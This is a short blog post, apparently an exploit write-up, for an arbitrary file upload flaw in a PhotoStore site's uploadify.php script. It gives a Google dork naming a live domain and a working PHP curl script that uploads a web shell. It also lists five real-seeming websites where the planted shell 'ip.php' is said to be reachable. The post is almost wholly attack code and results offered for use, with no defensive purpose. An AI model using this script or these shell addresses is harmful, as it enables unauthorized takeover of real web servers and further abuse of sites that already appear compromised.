Header Ads

PhotoStore Arbitrary Shell upload Vulnerability


# Exploit Title: PhotoStore Arbitrary Shell upload Vulnerability
# Google Dork: "site:photocity.co.za"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
#######################################################
#exploit

<?php

$uploadfile="ip.php";
$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

shell path:
[+] Shell : photocity.co.za/ip.php?ina=hajar
[+] Shell : http://www.rogueeventdigitals.co.uk/ip.php?ina=hajar
[+] Shell : http://www.saladeprensa.co/ip.php?ina=hajar
[+] Shell : http://www.stockthatphoto.co.uk/ip.php?ina=hajar
[+] Shell : photokaya.com/ip.php?ina=hajar

No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.